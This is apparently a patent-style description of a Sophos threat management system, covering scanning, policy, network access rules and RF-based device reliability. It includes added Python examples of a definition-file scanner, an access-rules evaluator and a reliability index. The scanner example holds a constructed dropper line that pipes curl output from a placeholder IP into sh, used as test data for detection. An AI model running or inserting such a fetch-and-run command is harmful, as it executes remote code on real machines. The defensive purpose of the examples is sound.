Client: Sophos

Threat Management System


Drawings

Brief Description:

Figure 1 illustrates an environment for threat management.

Detailed Description:

Figure 1 illustrates an environment for threat management. Specifically, Figure 1 depicts a block diagram of a threat management facility 168 providing protection to one or more enterprises, networks, locations, users, businesses, etc. against a variety of threats, a context in which the techniques disclosed herein may usefully be deployed. The threat management facility 168 may be used to protect devices and assets (e.g., IoT devices or other devices) from computer-generated and human-generated threats. For example, a corporation, school, web site, homeowner, network administrator, or other entity may institute and enforce one or more policies that control or prevent certain network users (e.g., employees, residents, users, guests, etc.) from accessing certain types of applications, devices, or resources, either generally or in a particular manner. Policies may be created, deployed, and managed, for example, through the threat management facility 168, which may update and monitor network devices, users, and assets accordingly.

The threat of malware or other compromise may be present at various points within a network 170, such as laptops, desktops, servers, gateways, communication ports, handheld or mobile devices, IoT devices, and firewalls. In addition to controlling or stopping malicious code, a threat management facility 168 may provide policy management to control devices, applications, or users that might otherwise undermine productivity and network performance within the network 170.

The threat management facility 168 may provide protection to the network 170 from computer-based malware, including viruses, spyware, adware, trojans, intrusion, spam, policy abuse, advanced persistent threats, uncontrolled access, and the like. In general, the network 170 may be any networked computer-based infrastructure or the like managed by the threat management facility 168, such as an organization, association, institution, or the like, or a cloud-based facility that is available for subscription by individuals. For example, the network 170 may be a corporate, commercial, educational, governmental, or other network, may include multiple networks, computing resources, and other facilities, may be distributed among more than one geographic location, and may include an administration facility 108, a firewall 110, an appliance 144, a server 136, network devices 132-B, and clients 114-D, such as IoT devices or other devices. It will be understood that any reference herein to a client or client facilities may include the clients 114-D shown in Figure 1 and vice versa. Further, the recitation of an element number ending with a letter should be understood to refer to a particular instance of the element, and the recitation of an element number without a letter should be understood to refer to any one or more instances of the element. Thus, for example, the recitation of the client 114 should be understood to refer only to the specific instance of the client labeled 114 in Figure 1, while the recitation of the clients 144 should be understood to refer to any one or more instances of the clients labeled 114, 116, 118, 128, 126, 130, and 120 in Figure 1, unless otherwise specified or made clear from the context.

The threat management facility 168 may include computers, software, or other computing facilities supporting a plurality of functions, such as one or more of a security management facility 102, a policy management facility 146, an update facility 150, a definitions management facility 156, a network access rules facility 106, a remedial action facility 152, a detection techniques facility 148, a testing facility 164, a threat research facility 104, and the like. In embodiments, the threat protection provided by the threat management facility 168 may extend beyond the network boundaries of the network 170 to include clients 128 (or client facilities) that have moved into network connectivity not directly associated with or controlled by the network 170. Threats to client facilities may come from a variety of sources, such as from network threats 154, physical proximity threats 158, a secondary location threat network 162, and the like. Clients 114-D may be protected from threats even when the client 114-D is not directly connected to or in association with the network 170, such as when a client 126-F moves in and out of the network 170, for example when interfacing with an unprotected server 138 through the internet 160, or when a client 130 moves into the secondary location threat network 162, such as when interfacing with components that are not protected (e.g., the appliance 166, the server 142, the network devices 122, 124, and the like).

The threat management facility 168 may use or may be included in an integrated system approach to provide the network 170 with protection from a plurality of threats to device resources in a plurality of locations and network configurations. The threat management facility 168 may also or instead be deployed as a stand-alone solution. For example, some or all of the threat management facility 168 components may be integrated into a server or servers at a remote location, for example in a cloud computing facility. As another example, some or all of the threat management facility 168 components may be integrated into a firewall, gateway, or access point within or at the border of the network 170. In some embodiments, the threat management facility 168 may be integrated into a product, such as a third-party product (e.g., through an application programming interface), which may be deployed on endpoints, on remote servers, on internal servers or gateways for a network, or some combination of these.

The security management facility 102 may include a plurality of elements that provide protection from malware to device resources of the network 170 in a variety of ways, including endpoint security and control, email security and control, web security and control, reputation-based filtering, control of unauthorized users, control of guest and non-compliant computers, and the like. The security management facility 102 may include a local software application that provides protection to one or more device resources of the network 170. The security management facility 102 may have the ability to scan client facility files for malicious code, remove or quarantine certain applications and files, prevent certain actions, perform remedial actions, and perform other security measures. This may include scanning some or all of the files stored on the client facility or accessed by the client facility on a periodic basis, scanning an application when the application is executed, scanning data (e.g., files or other communication) in transit to or from a device, etc. The scanning of applications and files may be performed to detect known or unknown malicious code or unwanted applications.

The security management facility 102 may provide email security and control. The security management facility 102 may also or instead provide for web security and control, such as by helping to detect or block viruses, spyware, malware, unwanted applications, and the like, or by helping to control web browsing activity originating from client devices. In certain embodiments, the security management facility 102 may provide for network access control, which may provide control over network connections. In addition, network access control may control access to virtual private networks (VPNs) that provide communications networks tunneled through other networks. The security management facility 102 may provide host intrusion prevention through behavior-based analysis of code, which may guard against known or unknown threats by analyzing behavior before or while code executes. Further, or instead, the security management facility 102 may provide reputation filtering, which may target or identify sources of code.

In embodiments, the security management facility 102 may use wireless characteristics to identify a device on the network 170. For example, the security management facility 102 may determine a reliability index value of any one or more devices (e.g., the servers 142, the clients 144, and combinations thereof) connected via a wireless link to the network 170, for example an IoT device. Through one or more access points (e.g., the firewall 110) or other sensors (e.g., the appliance 144) in the network 170, the security management facility 102 may monitor RF characteristics of the IoT device to obtain current RF characteristics. The security management facility 102 may compare the current RF characteristics to baseline RF characteristics; when the comparison shows a match between the current RF characteristics and the baseline RF characteristics, it may adjust the reliability index value to indicate greater reliability, and when the comparison shows no match, it may adjust the reliability index value to indicate lesser reliability. When the reliability index value exceeds a threshold value, the security management facility 102 may perform an action to reduce a potential threat of the IoT device to the network. This aspect of the security management facility 102 may also take place on the firewall 110 (e.g., an access point) or the appliance 144.

In general, the security management facility 102 may support overall security of the network 170 using the various techniques described above, optionally as supplemented by updates of malicious code information and so forth for distribution across the network 170.

The administration facility 108 may provide control over the security management facility 102 when updates are performed. Information from the security management facility 102 may also be sent from the enterprise back to a third party, a vendor, or the like, which may lead to improved performance of the threat management facility 168.

The policy management facility 146 of the threat management facility 168 may be configured to take actions, such as to block applications, users, communications, devices, and so on, based on determinations made. The policy management facility 146 may employ a set of rules or policies that determine network 170 access permissions for one or more of the clients 144. In some embodiments, a policy database may include a block list, a black list, an allowed list, a white list, or the like, or combinations of the foregoing, that may provide a list of resources internal or external to the network 170 that may or may not be accessed by the clients 144. The policy management facility 146 may also or instead include rule-based filtering of access requests or resource requests, or other suitable techniques for controlling access to resources consistent with a corresponding policy.

In embodiments, the policy management facility 146 may include reliability index thresholds for devices, such as IoT devices. The policy management facility 146 may include policies to permit or deny access, to take remedial action, to issue alerts, and so on, based on particular reliability index determinations.

The policy management facility 146 may also or instead provide configuration policies to be used to compare and control the configuration of applications, operating systems, hardware, devices, and the like associated with the network 170. An evolving threat environment may dictate timely updates, and thus the update management facility 150 may also be provided by the threat management facility 168. In addition, the policy management facility 146 may require update management (e.g., as provided by the update facility 150 herein described). In embodiments, the update management facility 150 may provide for patch management or other software updating, version control, and so forth. 

The security management facility 102 and the policy management facility 146 may push information to the network 170 and/or to a given one or more of the clients 144. The network 170 and/or one or more of the clients 114-F may also or instead request information from the security management facility 102, the policy management facility 146, or the servers 136-C, or there may be a combination of pushing and pulling of information. In some embodiments, the update modules of the policy management facility 146 and the security management facility 102 may work in concert to provide information to the network 170 and/or to one or more of the clients 114 for control of applications, devices, users, and so on.

As threats are identified and characterized, the threat management facility 168 may create updates that may be used to allow the threat management facility 168 to detect and remediate malicious software, unwanted applications, configuration and policy changes, and the like. The definitions management facility 156 may contain threat identification updates, also referred to as definition files. A definition file may be a virus identity file that may include definitions of known or potential malicious code. The virus identity definition files may provide information that may identify malicious code within files, applications, or the like. The definition files may be accessed by the security management facility 102 when scanning files or applications within the client facility to determine whether malicious code may be within the file or application. The definitions management facility 156 may include a definition for a neural network or other recognition engine. The definitions management facility 156 may provide timely updates of definition file information to the network, client facilities, and the like.

In embodiments, the definitions management facility 156 may include default values or baseline values for RF characteristics of devices, such as IoT devices. For example, the definitions management facility 156 may include a baseline value for particular RF characteristics of a particular IoT device.

The security management facility 102 may be used to scan an outgoing file and verify that the outgoing file is permitted to be transmitted per the rules and policies of the network 170. By checking outgoing files, the security management facility 102 may be able to discover malicious code in infected files that were not detected as incoming files, for example because the definition identifying the code was not yet available when the file arrived.
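The two preceding passages describe definition files and scanning of files both on arrival and before transmission. The following is an added example of how that fits together; it is not code from the page or from Sophos. The definition-file layout (a version number and a list of identities, each either a SHA-256 digest or a hex byte pattern in which `??` matches any byte), the identity names, the `Scanner` and `Gateway` classes and the sample files are all constructed for illustration. The scenario shows the point the text makes: a file cleared on arrival under one definition set is caught on the way out once a newer set is loaded.

```python
"""Definition files and file scanning, incoming and outgoing (added example)."""
import hashlib
import re


def compile_pattern(hex_pattern: str) -> re.Pattern:
    """Turn '4d5a????5045' into a bytes regex; '??' matches any single byte (assumed format)."""
    hex_pattern = hex_pattern.replace(" ", "")
    if len(hex_pattern) % 2:
        raise ValueError("odd-length hex pattern")
    pieces = []
    for i in range(0, len(hex_pattern), 2):
        tok = hex_pattern[i:i + 2]
        pieces.append(b"." if tok == "??" else b"\\x%02x" % int(tok, 16))
    return re.compile(b"".join(pieces), re.DOTALL)


class Scanner:
    """Loads one definition file; scan() returns the names of the identities that match."""

    def __init__(self, definitions: dict):
        self.version = definitions["version"]
        self.hashes = {}
        self.patterns = []
        for ident in definitions["identities"]:
            if ident["kind"] == "sha256":
                self.hashes[ident["value"].lower()] = ident["name"]
            elif ident["kind"] == "pattern":
                self.patterns.append((ident["name"], compile_pattern(ident["value"])))
            else:
                raise ValueError(f"unknown identity kind {ident['kind']!r}")

    def scan(self, data: bytes) -> list:
        hits = []
        by_hash = self.hashes.get(hashlib.sha256(data).hexdigest())
        if by_hash:
            hits.append(by_hash)
        hits.extend(name for name, pat in self.patterns if pat.search(data))
        return hits


class Gateway:
    """Scans files on arrival and again before transmission, with whatever definitions are current."""

    def __init__(self, definitions: dict):
        self.scanner = Scanner(definitions)
        self.store = {}        # files cleared on arrival, name -> data
        self.quarantine = {}   # name -> identities that matched

    def update_definitions(self, definitions: dict) -> None:
        self.scanner = Scanner(definitions)

    def receive(self, name: str, data: bytes) -> tuple:
        hits = self.scanner.scan(data)
        if hits:
            self.quarantine[name] = hits
            return ("blocked", hits)
        self.store[name] = data
        return ("stored", [])

    def send(self, name: str) -> tuple:
        # Re-scan on the way out: the definitions may be newer than when the file arrived.
        hits = self.scanner.scan(self.store[name])
        if hits:
            self.quarantine[name] = hits
            del self.store[name]
            return ("blocked", hits)
        return ("sent", [])


# Constructed samples and definition files (none of these are real identities).
STUB_B = b"MZ\x90\x00\x03\x00PE\x00\x00" + b"\x00" * 16          # fake PE-like stub
DROPPER_C = b"#!/bin/sh\ncurl -s http://203.0.113.5/p | sh\n"      # fake dropper script
NOTES = b"quarterly numbers attached\n"

DEFINITIONS_V1 = {"version": 1, "identities": [
    {"name": "Test/Stub-B", "kind": "pattern", "value": "4d5a????????5045"},
]}
DEFINITIONS_V2 = {"version": 2, "identities": DEFINITIONS_V1["identities"] + [
    {"name": "Test/Dropper-C", "kind": "sha256", "value": hashlib.sha256(DROPPER_C).hexdigest()},
]}


def run_scenario() -> dict:
    """The dropper arrives before its identity exists and is caught on the way out after an update."""
    gw = Gateway(DEFINITIONS_V1)
    results = {
        "stub_in": gw.receive("setup.exe", STUB_B),
        "dropper_in": gw.receive("invoice.sh", DROPPER_C),
        "notes_in": gw.receive("notes.txt", NOTES),
    }
    gw.update_definitions(DEFINITIONS_V2)
    results["dropper_out"] = gw.send("invoice.sh")
    results["notes_out"] = gw.send("notes.txt")
    results["quarantined"] = sorted(gw.quarantine)
    return results


if __name__ == "__main__":
    for step, outcome in run_scenario().items():
        print(f"{step:12s} {outcome}")
```

The pattern identity catches the stub on arrival; the script passes the version 1 scan, is stored, and is blocked by the outgoing scan after the version 2 definitions (which add its digest) are loaded. Hash identities are exact and cheap but miss any variant; byte patterns with wildcards tolerate small changes at the cost of a scan over the whole file.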

The threat management facility 168 may provide controlled access to the network 170. For example, the network access rules facility 106 may be responsible for determining whether an application running on a given one or more of the clients 144 should be granted access to a requested network resource. In some embodiments, the network access rules facility 106 may verify access rights for one or more of the client facilities to or from the network 170 or may verify access rights of computer facilities to or from external networks. When network access for a client facility is denied, the network access rules facility 106 may send an information file to the client facility (e.g., a command or command file that the remedial action facility 152 may access and take action upon). The network access rules facility 106 may include one or more databases including one or more of a block list, a black list, an allowed list, a white list, a reputation list, an unacceptable network resource database, an acceptable network resource database, a network resource reputation database, or the like. The network access rules facility 106 may incorporate rule evaluation. Rule evaluation may, for example, parse network access requests and apply the parsed information to network access rules. The network access rules facility 106 may also or instead provide updated rules and policies to the network 170.
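The policy database of block, allowed and reputation lists described for the policy management facility 146 above, and the rule evaluation over parsed access requests described for the network access rules facility 106 in this paragraph, are illustrated by the following added example. It is not code from the page or from Sophos. The list contents, the rule order (block list, then allowed list, then reputation, then per-application rules, then a default), the 0 to 100 reputation scale and the shape of the command handed to the remedial action facility on a denial are assumptions made for illustration.

```python
"""Network access rules evaluation (added example)."""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit
import ipaddress


@dataclass(frozen=True)
class AccessRequest:
    client_id: str
    application: str
    host: str
    port: int


def parse_request(client_id: str, application: str, resource: str) -> AccessRequest:
    """Parse the requested resource (URL or host[:port]) into the fields the rules act on."""
    if "://" not in resource:
        resource = "tcp://" + resource
    parts = urlsplit(resource)
    if not parts.hostname:
        raise ValueError(f"cannot parse resource {resource!r}")
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme, 0)
    return AccessRequest(client_id, application, parts.hostname.lower(), port)


def host_matches(host: str, entries) -> bool:
    """Exact host, parent-domain ('example.test' covers 'a.example.test') or CIDR match."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    for entry in entries:
        if "/" in entry:
            if addr is not None and addr in ipaddress.ip_network(entry, strict=False):
                return True
        elif host == entry or host.endswith("." + entry):
            return True
    return False


@dataclass(frozen=True)
class Decision:
    allow: bool
    rule: str
    command: Optional[dict] = None   # on deny: command for the remedial action facility


class NetworkAccessRules:
    """Rules are evaluated in a fixed order; the first rule that applies decides."""

    def __init__(self, block_list, allow_list, reputation, min_reputation, app_rules,
                 default_allow=True):
        self.block_list = set(block_list)
        self.allow_list = set(allow_list)
        self.reputation = dict(reputation)      # host -> score 0..100, higher is better
        self.min_reputation = min_reputation
        self.app_rules = {app: set(hosts) for app, hosts in app_rules.items()}
        self.default_allow = default_allow

    def _deny(self, req: AccessRequest, rule: str) -> Decision:
        command = {"client": req.client_id, "action": "block", "application": req.application,
                   "host": req.host, "port": req.port, "reason": rule}
        return Decision(False, rule, command)

    def evaluate(self, req: AccessRequest) -> Decision:
        # 1. The block list wins over everything, so a blocked subdomain of an
        #    allowed parent domain stays blocked.
        if host_matches(req.host, self.block_list):
            return self._deny(req, "block_list")
        # 2. Explicitly allowed resources.
        if host_matches(req.host, self.allow_list):
            return Decision(True, "allow_list")
        # 3. Reputation list: known-bad scores are denied, unknown hosts fall through.
        score = self.reputation.get(req.host)
        if score is not None and score < self.min_reputation:
            return self._deny(req, f"reputation:{score}<{self.min_reputation}")
        # 4. Per-application rule: an application with a rule may reach only its listed hosts.
        permitted = self.app_rules.get(req.application)
        if permitted is not None and not host_matches(req.host, permitted):
            return self._deny(req, f"app_rule:{req.application}")
        # 5. Default.
        return Decision(True, "default") if self.default_allow else self._deny(req, "default")


# Constructed policy database; every entry is illustrative.
RULES = NetworkAccessRules(
    block_list={"malware.test", "203.0.113.0/24"},
    allow_list={"updates.vendor.test", "intranet.test"},
    reputation={"sketchy.test": 20, "news.test": 85},
    min_reputation=40,
    app_rules={"updater": {"updates.vendor.test"}},
)

if __name__ == "__main__":
    samples = [("c1", "browser", "https://malware.test/payload"),
               ("c1", "browser", "http://203.0.113.7:8080/"),
               ("c2", "updater", "https://updates.vendor.test/feed"),
               ("c2", "updater", "https://news.test/"),
               ("c3", "browser", "https://sketchy.test/"),
               ("c3", "browser", "https://news.test/")]
    for client, app, resource in samples:
        d = RULES.evaluate(parse_request(client, app, resource))
        print(f"{client} {app:8s} {resource:36s} -> {'allow' if d.allow else 'deny'} ({d.rule})")
```

Putting the block list ahead of the allowed list is a deliberate choice: it means an operator who allows a parent domain does not silently unblock a host that was blocked by name or address. The per-application rule shows the request-level granularity the text describes, in that the same host is reachable by the browser but not by the updater.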

When a threat or policy violation is detected by the threat management facility 168, the threat management facility 168 may perform or initiate remedial action through the remedial action facility 152. Remedial action may take a variety of forms, such as terminating or modifying an ongoing process or interaction, issuing an alert, sending a warning (e.g., to a client or to the administration facility 108) of an ongoing process or interaction, executing a program or application to remediate against a threat or violation, recording interactions for subsequent evaluation, and so forth. The remedial action may include one or more of blocking some or all requests to a network location or resource, performing a malicious code scan on a device or application, performing a malicious code scan on one or more of the clients 144, quarantining a related application (or files, processes, or the like), terminating the application or device, isolating the application or device, moving a process or application code to a sandbox for evaluation, isolating one or more of the clients 144 to a location or status within the network that restricts network access, blocking a network access port from one or more of the clients 144, reporting the application to the administration facility 108, or the like, as well as any combination of the foregoing.

In embodiments, remedial action may be taken based on a reliability index determination based on RF characteristics of a wireless device.
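The RF-based reliability index is spread over four passages above: the comparison of current against baseline RF characteristics and the adjustment of the index (security management facility 102), the per-device thresholds (policy management facility 146), the baseline values (definitions management facility 156) and the remedial action taken on the result (this paragraph). The following added example ties them together; it is not code from the page or from Sophos. The page names no specific RF characteristics, tolerances, step sizes, thresholds or actions, so the fields of `RFCharacteristics`, the `TOLERANCE`, `MATCH_STEP` and `MISMATCH_STEP` values, the `POLICY` table and the sample observations are all assumptions. The page says the action is taken when the index "exceeds" a threshold; because the index is raised on a match and lowered on a mismatch, this example assumes the action fires when the index falls below the policy threshold.

```python
"""Reliability index from wireless (RF) characteristics (added example)."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class RFCharacteristics:
    """Observed RF characteristics of one wireless device (assumed fields)."""
    channel: int               # 802.11 channel the device is seen on
    rssi_dbm: float            # signal strength measured at the access point
    tx_rate_mbps: float        # negotiated transmit rate
    frame_interval_ms: float   # mean spacing between management frames


# Per-field tolerance (assumed): an observation matches the baseline when the channel is
# identical and every numeric field is within tolerance.
TOLERANCE = {"rssi_dbm": 6.0, "tx_rate_mbps": 10.0, "frame_interval_ms": 5.0}


def matches_baseline(current: RFCharacteristics, baseline: RFCharacteristics) -> bool:
    if current.channel != baseline.channel:
        return False
    return all(abs(getattr(current, name) - getattr(baseline, name)) <= tol
               for name, tol in TOLERANCE.items())


# Step sizes (assumed): a mismatch costs far more than a match earns, so a device that
# has drifted from its baseline cannot quickly buy its trust back.
MATCH_STEP = 0.05
MISMATCH_STEP = 0.25


@dataclass
class DeviceState:
    device_id: str
    reliability: float = 1.0            # index in [0, 1]; a newly baselined device starts trusted
    history: list = field(default_factory=list)


def update_reliability(state: DeviceState, current: RFCharacteristics,
                       baseline: RFCharacteristics) -> float:
    """Raise the index on a match, lower it on a mismatch, clamped to [0, 1]."""
    if matches_baseline(current, baseline):
        state.reliability = min(1.0, state.reliability + MATCH_STEP)
        state.history.append("match")
    else:
        state.reliability = max(0.0, state.reliability - MISMATCH_STEP)
        state.history.append("mismatch")
    return state.reliability


# Policy management facility: threshold and remedial action per device class (assumed).
POLICY = {
    "camera":     {"threshold": 0.50, "action": "isolate"},
    "thermostat": {"threshold": 0.70, "action": "alert"},
}


def evaluate(state: DeviceState, device_class: str) -> str:
    """Return the policy's remedial action once the index falls below the class threshold."""
    policy = POLICY[device_class]
    return policy["action"] if state.reliability < policy["threshold"] else "allow"


def monitor(device_id: str, device_class: str, baseline: RFCharacteristics,
            observations: list) -> tuple:
    """Apply the comparison to a sequence of observations; return final state and decisions."""
    state = DeviceState(device_id)
    decisions = []
    for observed in observations:
        update_reliability(state, observed, baseline)
        decisions.append(evaluate(state, device_class))
    return state, decisions


# Constructed sample: a camera's baseline (as the definitions facility would hold it), two
# observations that match it, then three from a device on another channel with a much
# stronger signal, which is how a device impersonating the camera near the access point might look.
CAMERA_BASELINE = RFCharacteristics(channel=6, rssi_dbm=-58.0, tx_rate_mbps=54.0, frame_interval_ms=102.0)
CAMERA_OBSERVATIONS = [
    RFCharacteristics(6, -60.0, 54.0, 101.5),
    RFCharacteristics(6, -57.0, 48.0, 103.0),
    RFCharacteristics(11, -31.0, 72.0, 100.0),
    RFCharacteristics(11, -30.0, 72.0, 100.0),
    RFCharacteristics(11, -32.0, 72.0, 100.0),
]

if __name__ == "__main__":
    state, decisions = monitor("cam-01", "camera", CAMERA_BASELINE, CAMERA_OBSERVATIONS)
    for step, (event, decision) in enumerate(zip(state.history, decisions), 1):
        print(f"{step}: {event:8s} -> {decision}")
    print(f"final reliability index: {state.reliability:.2f}")
```

With these values the camera is isolated on the third consecutive mismatch, while a thermostat, whose policy threshold is stricter, would be alerted on after two. The asymmetry between `MATCH_STEP` and `MISMATCH_STEP` is the security-relevant knob: a symmetric step would let an attacker alternate matching and non-matching frames and keep the index above the threshold indefinitely.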

Remedial action may be provided as a result of a detection of a threat or violation. The detection techniques facility 148 may include tools for monitoring the network 170 or managed devices within the network 170. The detection techniques facility 148 may provide functions such as monitoring activity and stored files on computing facilities. Detection techniques, such as scanning a computer's stored files, may provide the capability of checking files for stored threats, either in the active or the passive state. Detection techniques such as streaming file management may be used to check files received at the network 170, a gateway facility, a client facility, and the like.

Verifying that the threat management facility 168 detects threats and violations of established policy may require the ability to test the system, either at the system level or for a particular computing component. The testing facility 164 may allow the administration facility 108 to coordinate the testing of the security configurations of computing facilities of the clients 144 on the network 170. For example, the administration facility 108 may be able to send test files to a set of computing facilities of the clients 144 to test the ability of a given client facility to determine the acceptability of the test file. After the test file has been transmitted, a recording facility may record the actions taken by one or more of the clients 144 in reaction to the test file. The recording facility may aggregate the testing information from the clients 144 and report the testing information to the administration facility 108. The administration facility 108 may be able to determine the level of preparedness of the respective clients 144 based on the reported information. Remedial action may be taken for any of the clients 144 as determined by the administration facility 108.

The threat management facility 168 may provide threat protection across the network 170 to devices such as the clients 144, the servers 142, the administration facility 108, the firewall 110, a gateway, one or more of the network devices 132 (e.g., hubs and routers), one or more of the appliances 140 (e.g., a threat management appliance), any number of desktop or mobile users, and the like. As used herein, the term endpoint may refer to any compute instance running on a device that can source data, receive data, evaluate data, buffer data, process data, or the like (such as a user's desktop computer, laptop, IoT device, server, etc.). This may, for example, include any client devices as well as other network devices and the like within the network 170, such as a firewall or gateway (as a data evaluation endpoint computer system), a laptop (as a mobile endpoint computer), a tablet (as a hand-held endpoint computer), a mobile phone, or the like. The term endpoint may also or instead refer to any final or intermediate source or destination for data within a network 170. An endpoint computer security facility 112 may be an application locally loaded onto any corresponding computer platform or computer support component, either for local security functions or for management by the threat management facility 168 or other remote resource, or any combination of these.

The network 170 may include a plurality of client facility computing platforms (e.g., the clients 144) on which the endpoint computer security facility 112 is installed. A client facility computing platform may be a computer system that is able to access a service on another computer, such as one or more of the servers 142, via a network. The endpoint computer security facility 112 may, in corresponding fashion, provide security in any suitable context, such as among a plurality of networked applications, for a client facility connecting to an application server facility, for a web browser client facility connecting to a web server facility, for an e-mail client facility retrieving e-mail from an internet 160 service provider's mail storage servers or web site, and the like, as well as any variations or combinations of the foregoing. As used herein, any one or more of the application server facility, the web server facility, and the mail storage servers should be understood to include one or more of the servers 142.

The network 170 may include one or more of the servers 142, such as application servers, communications servers, file servers, database servers, proxy servers, mail servers, fax servers, game servers, web servers, and the like. The servers 142, which may also be referred to as server facilities 142, server facility 142 applications, server facility 142 operating systems, server facility 142 computers, or the like, may be any device(s), application program(s), operating system(s), or combination of the foregoing that accepts client facility connections to service requests from the clients 144. In embodiments, the threat management facility 168 may provide threat protection to server facilities 142 within the network 170 as load conditions and application changes are made. 

The server facilities 142 may include an appliance facility 140, where the appliance facility 140 provides specific services to other devices on the network 170. The server facilities may also include simple appliances utilized across the network 170 infrastructure, such as switches, routers, hubs, gateways, print servers, modems, and the like. These appliances may provide interconnection services within the network 170, and therefore may advance the spread of a threat if not properly protected.

The clients 144 may be protected from threats from within the network 170 using a local or personal firewall, which may be a hardware firewall, a software firewall, or a combination thereof, that controls network traffic to and from a client. The local firewall may permit or deny communications based on a security policy. The endpoint computer security facility 112 may additionally protect the firewall 110, which may include hardware or software, in a standalone device or integrated with another network component, that may be configured to permit, deny, or proxy data through the network 170.

The interface between the threat management facility 168 and the network 170, and through the appliance 140 to embedded endpoint computer security facilities, may include a set of tools that may be the same or different for various implementations, and may allow each network administrator to implement custom controls. In embodiments, these controls may include both automatic actions and managed actions. The administration facility 108 may configure policy rules that determine interactions. The administration facility 108 may also establish license management, which in turn may further determine interactions associated with licensed applications. In embodiments, interactions between the threat management facility 168 and the network 170 may provide threat protection to the network 170 by managing the flow of network data into and out of the network 170 through automatic actions that may be configured by the threat management facility 168, for example by action or configuration of the administration facility 108.

The clients 144 within the network 170 may be connected to the network 170 by way of the network devices 132-B, which may be wired devices or wireless facilities. The clients 144 may be mobile wireless facilities and, because of their ability to connect to a wireless network access point, may connect to the internet 160 outside the physical boundary of the network 170, and therefore outside the threat-protected environment of the network 170. Such mobile wireless facilities, if not for the presence of a locally-installed endpoint computer security facility 112, may be exposed to a malware attack or perform actions counter to the policies of the network 170. Thus, the endpoint computer security facility 112 may provide local protection against various threats and policy violations. The threat management facility 168 may also or instead be configured to protect the out-of-enterprise mobile client facility (e.g., the clients 144) through interactions over the internet 160 (or other network) with the locally-installed endpoint computer security facility 112. Thus, mobile client facilities that are components of the network 170 but temporarily outside connectivity with the network 170 may be provided with the same or similar threat protection and policy control provided to the clients 144 inside the network 170. In addition, mobile client facilities (e.g., the clients 144) may receive the same interactions to and from the threat management facility 168 as client facilities 144 inside the network 170, such as by receiving the same or equivalent services via an embedded endpoint computer security facility 112.

Interactions between the threat management facility 168 and the components of the network 170, including mobile client facility extensions of the network 170, may ultimately be connected through the internet 160 or any other network or combination of networks. Security-related or policy-related downloads and upgrades to the network 170 may be passed from the threat management facility 168 through to components of the network 170 equipped with the endpoint computer security facility 112. In turn, the endpoint computer security facilities 112 of the network 170 may upload policy and access requests back across the internet 160 and through to the threat management facility 168. The internet 160, however, is also the path through which threats may be transmitted from their source, and one or more of the endpoint computer security facilities 112 may be configured to protect a device outside the network 170 through locally-deployed protective measures and through suitable interactions with the threat management facility 168.

Thus, if the mobile client facility were to attempt to connect to an unprotected connection point, such as at the secondary location threat network 162 that is not a part of the network 170, the mobile client facility, such as one or more of the clients 144, may be required to request network interactions through the threat management facility 168, where contacting the threat management facility 168 may be performed prior to any other network action. In embodiments, the endpoint computer security facility 112 of the client 144 may manage actions in unprotected network environments, such as when the client facility (e.g., the client 130) is in a secondary location 162, where the endpoint computer security facility 112 may dictate which applications, actions, resources, users, etc. are allowed, blocked, modified, or the like.

The secondary location threat network 162 may have no endpoint computer security facilities 112 as a part of its components, such as the firewall 140, the server 142, the client 120, the network devices 122, 124 (e.g., hubs and routers), and the like. As a result, the components of the secondary location threat network 162 may be open to threat attacks and may become potential sources of threats, as may any mobile enterprise facility clients (e.g., the clients 116-F) that may be connected to the secondary location threat network 162. In such instances, these components may unknowingly spread a threat to other devices connected to the network 170.

Some threats do not come directly from the internet 160. For example, one or more physical proximity threats 158 may be deployed on a client device while that device is connected to an unprotected network connection outside the network 170 and, when the client device is subsequently connected to one or more of the clients 144 on the network 170, the device can deploy malware or otherwise pose a threat. In embodiments, the endpoint computer security facility 112 may protect the network 170 against these types of physical proximity threats 158, for instance by scanning any device prior to allowing data transfers, by requiring security validation certificates, by establishing a safe zone within the network 170 to receive data for evaluation, and the like.

Brief Description:

Figure 2 illustrates a computer system 200 in accordance with one embodiment.

Detailed Description:

Figure 2 illustrates a computer system. In general, the computer system 200 may include a computing device 206 connected to a network 202, for example, through an external device 204. The computing device 206 may be or may include any type of network endpoint or endpoints as described herein, such as, for example, the network endpoints described above with reference to Figure 1. For example, the computing device 206 may include a desktop computer workstation. The computing device 206 may also or instead be any suitable device that has processes and communicates over the network 202, including, without limitation, a laptop computer, a desktop computer, a personal digital assistant, a tablet, a mobile phone, a television, a set top box, a wearable computer (e.g., watch, jewelry, or clothing), or a home device (e.g., a thermostat or a home appliance controller), just as some examples. The computing device 206 may also or instead include a server, or it may be disposed on a server.

The computing device 206 may be used for any of the entities described in the threat management environment described above with reference to Figure 1. For example, the computing device 206 may be a server, a client, an enterprise facility, a threat management facility, or any of the other facilities or computing devices described therein. In certain aspects, the computing device 206 may be implemented using hardware (e.g., in a desktop computer), software (e.g., in a virtual machine or the like), or a combination of software and hardware, and the computing device 206 may be a standalone device, a device integrated into another entity or device, a platform distributed across multiple entities, or a virtualized device executing in a virtualization environment.

The network 202 may include any network described above, e.g., data network(s) or internetwork(s) suitable for communicating data and control information among participants in the computer system 200. This may include public networks such as the internet, private networks, and telecommunications networks such as the Public Switched Telephone Network or cellular networks using third generation cellular technology (e.g., 3G or IMT-2000), fourth generation cellular technology (e.g., 4G, LTE, IMT-Advanced, E-UTRA, etc., or WiMax-Advanced (IEEE 802.16m)), and/or other technologies, as well as any of a variety of corporate area, metropolitan area, campus, or other local area networks or enterprise networks, along with any switches, routers, hubs, gateways, and the like that might be used to carry data among participants in the computer system 200. The network 202 may also include a combination of data networks, and need not be limited to a strictly public or private network.

The external device 204 may be any computer or other remote resource that connects to the computing device 206 through the network 202. This may include threat management resources such as any of those contemplated above, gateways or other network devices, remote servers or the like containing content requested by the computing device 206, a network storage device or resource, a device hosting malicious content, or any other resource or device that might connect to the computing device 206 through the network 202.

The computing device 206 may include a processor 208, a memory 210, a network interface 212, a data store 214, and one or more input/output interfaces 216. The computing device 206 may further include or be in communication with peripherals 218 and other external input/output devices.

The processor 208 may be any as described herein, and in general may be capable of processing instructions for execution within the computing device 206 or computer system 200. The processor 208 may include a single-threaded processor or a multi-threaded processor. The processor 208 may be capable of processing instructions stored in the memory 210 or on the data store 214.

